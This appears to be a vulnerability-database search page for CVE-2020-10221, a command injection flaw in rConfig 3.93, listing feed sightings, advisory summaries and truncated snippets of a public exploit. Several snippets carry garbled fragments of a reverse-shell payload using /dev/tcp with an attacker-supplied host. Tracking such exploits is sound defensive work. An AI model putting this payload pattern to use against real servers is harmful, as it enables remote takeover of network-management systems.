8 matches found
CVE-2020-10221
creationtimestamp| type| source ---|---|--- 2021-11-08 08:58:19+00:00| seen| MISP/f5030aca-7d5a-43a4-ae03-8f4ac8e85422 2021-11-20 09:53:52+00:00| seen| MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123 2024-12-24 20:22:06+00:00| seen| https://feedsin.space/feed/CISAKevBot/items/2970944 2025-02-06...
rConfig Command Injection (CVE-2020-10221)
A command injection vulnerability exists in rConfig. Successful exploitation of this vulnerability would allow remote attackers to execute arbitrary commands on the affected system...
rConfig 3.93 - ajaxAddTemplate.php Authenticated Remote Code Execution
rConfig 3.93 - ajaxAddTemplate.php Authenticated Remote Code Execution Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution Date: 2020-03-08 Exploit Author: Engin Demirbilek Vendor Homepage: https://www.rconfig.com/ Version: rConfig & /dev/tcp//...
rConfig 3.93 - (ajaxAddTemplate.php) Authenticated Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution Exploit Author: Engin Demirbilek Vendor Homepage: https://www.rconfig.com/ Version: rConfig & /dev/tcp// 0&1;".formatsys.argv4, sys.argv5 login =...
rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution
Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution Date: 2020-03-08 Exploit Author: Engin Demirbilek Vendor Homepage: https://www.rconfig.com/ Version: rConfig & /dev/tcp// 0&1;".formatsys.argv4, sys.argv5 login = 'user':user, 'pass':password, 'sublogin':'1' r...
rConfig 3.93 Authenticated Remote Code Execution
Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution Date: 2020-03-08 Exploit Author: Engin Demirbilek Vendor Homepage: https://www.rconfig.com/ Version: rConfig & /dev/tcp// 0&1;".formatsys.argv4, sys.argv5 login = 'user':user, 'pass':password, 'sublogin':'1' r...
CVE-2020-10221
CVE-2020-10221 (rConfig) is a remote code execution vulnerability in the rConfig utility. Multiple connected sources confirm that lib/ajaxHandlers/ajaxAddTemplate.php contains an OS command injection flaw that allows an attacker to execute arbitrary OS commands, by injecting shell metacharacters ...
CVE-2020-10221
lib/ajaxHandlers/ajaxAddTemplate.php in rConfig through 3.94 allows remote attackers to execute arbitrary OS commands via shell metacharacters in the fileName POST parameter...